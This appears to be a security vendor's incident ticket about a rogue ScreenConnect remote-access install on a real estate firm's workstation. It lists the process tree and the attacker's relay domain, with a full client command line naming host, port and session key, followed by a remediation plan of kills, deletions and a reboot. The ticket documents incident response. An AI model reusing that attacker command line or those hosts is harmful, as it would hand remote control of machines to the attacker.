#32235 [Huntress Detection] CRITICAL - ISOLATED - Incident on FRP-PatXPS (Farran Realty Partners)

Status: Resolved | Created: Feb 5, 2025, 3:43 PM | Resolved: Feb 5, 2025, 5:56 PM

Huntress (internal) Feb 5, 2025, 3:43 PM
*** The Huntress Agent has been tasked to isolate this host from the rest of the network in order to prevent the incident from spreading to other hosts. ***

Host: FRP-PatXPS - https://artichoke.huntress.io/org/143732/agents/3029886
Organization: Farran Realty Partners
Tags: None
Security Products: Windows Defender

Incident Report: https://artichoke.huntress.io/org/143732/infection_reports/1404993
Severity: Critical

Investigative Summary
---------------------
[WARNING]
Please review this incident report to understand what was identified before remediating. There may be unknown malicious processes, files, or other changes made to the host that remain undetected. Restoring from a known good backup or clean OS install is the only way to ensure a complete host-level remediation. While the Assisted Remediation service is an option, it will only remove specific items documented in this report.

Huntress detected the following:
- Rogue ScreenConnect Install: Huntress has been tracking a number of malicious threat actors convincing users via email to run malicious ScreenConnect (ConnectWise Control) installers that give the threat actor remote access to the host.

On '2025-02-05 15:31:11 UTC' Huntress detected a rogue ScreenConnect instance on the host 'FRP-PatXPS' installed by the user 'jpcorrick'. This ScreenConnect was installed from https://www.fihelp[.]top
This ScreenConnect agent is configured to communicate with the following domain which does not appear to be the standard management site used by this organization:
- mali234[.]top

Remediation Instructions
------------------------
To remediate, perform the actions below:
- Remove the "c:\users\jpcorrick\appdata\local\apps\2.0\v5xod0ol.z9v\025691br.4vt\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\screenconnect.windowsclient.exe" file and ensure it is not recreated.

Processes
---------
Start Time: 2025-02-05 15:31:09 UTC
Command: "C:\Users\jpcorrick\Downloads\support.Client.exe"
Executable: C:\Users\jpcorrick\Downloads\support.Client.exe
Process ID: c71fcd74-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Program Files\Google\Chrome\Application\chrome.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:32 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcdb8-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:30:43 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd5c-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:09 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd78-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:30 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcdae-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:30:37 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd56-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:32 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
Process ID: c71fcdb6-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:24 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd8a-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

-------------------------
Thanks again for trusting Huntress and please don't hesitate to reach out to [email protected] if you have any questions.

Artichoke Support - Peet (internal) Feb 5, 2025, 4:43 PM
The following remediation plan was approved by [email protected]:

Assisted Remediations:
Kill Process: ["Path: C:\\Users\\jpcorrick\\Downloads\\support.Client.exe", "Pid: 23236"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 22888"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 20544"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 18724"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 15544"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 4412"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.WindowsClient.exe", "Pid: 26516"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 21252"]
Delete File: ["Path: c:\\users\\jpcorrick\\appdata\\local\\apps\\2.0\\v5xod0ol.z9v\\025691br.4vt\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\screenconnect.windowsclient.exe"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.WindowsClient.exe", "Pid: 26516"]
Delete File: ["Path: C:\\Users\\jpcorrick\\Downloads\\support.Client.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.Override.en-US.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.Override.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.en-US.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsBackstageShell.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsBackstageShell.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsFileManager.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsFileManager.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\app.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\user.config"]
Reboot the Host: ["Remediation: A reboot is required to complete the remediation plan"]